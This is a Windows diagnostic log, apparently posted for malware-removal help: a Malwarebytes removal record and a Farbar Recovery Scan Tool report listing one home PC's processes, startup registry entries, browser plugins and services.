    File "C:\WINDOWS\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TabSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\termsrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\tapisrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\THEMESERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TIMEBROKERSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\umrdp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Unistore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\usermgr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\usocore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\vaultsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\w32time.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetsrv\w3logsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbiosrvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wwansvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WUDFSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wlidsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wlansvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wcncsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wcncsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WebClnt.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WCSPLUGINSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wdi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WEPHOSTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wiarpc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\WMIsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WPDBUSENUM.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WPNSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WSSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wuaueng.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\XBOXNETAPISVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rundll32.exe" is sparse (flags = 32768)
    File "C:\Program Files\Windows Mail\WinMail.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\unregmp2.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ie4uinit.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\SysWOW64\rundll32.exe" is sparse (flags = 32768)
    File "C:\ProgramData\AVAST Software\Avast\log\AvastSvc.log" is compressed (flags = 1)
    File "C:\ProgramData\AVAST Software\Avast\log\AvastUI.log" is compressed (flags = 1)
    File "C:\ProgramData\AVAST Software\Avast\log\CommChannel.Protocol.log" is compressed (flags = 1)
    File "C:\Users\Kym\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
    Scan finished
    =======================================


    Removal queue found; removal started
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-206848-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-1-0-206848-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-2-0-2048-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
    Removal finished

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
    Ran by Kym (administrator) on KYM-PC (01-03-2016 22:11:51)
    Running from C:\Users\Kym\Desktop
    Loaded Profiles: Kym (Available Profiles: Kym)
    Platform: Windows 10 Home (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (AMD) C:\WINDOWS\System32\atiesrxx.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
    (AMD) C:\WINDOWS\System32\atieclxx.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
    (Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
    () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
    (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
    (Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
    (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
    (Angus Johnson) D:\Internode\mum.exe
    (Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
    (Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
    (Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
    (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    (Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Microsoft Corporation) C:\WINDOWS\System32\InstallAgent.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
    HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
    HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
    HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
    HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
    HKLM-x32\...\Run: [] => [X]
    HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
    HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
    ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
    Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
    ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 8.8.8.8,8.8.4.4
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
    BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
    BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
    Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

    FireFox:
    ========
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
    FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
    FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
    FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
    FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://www.google.com/
    CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
    CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
    CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
    CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
    CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
    CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
    CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
    R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
    S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
    R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
    R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
    S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
    R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
    R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
    R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
    R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [351120 2015-07-18] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    S2 MBAMService; D:\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
    S3 PAExec; C:\Windows\PAExec.exe [190464 2014-10-18] (Power Admin LLC) [File not signed]
    R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc.)
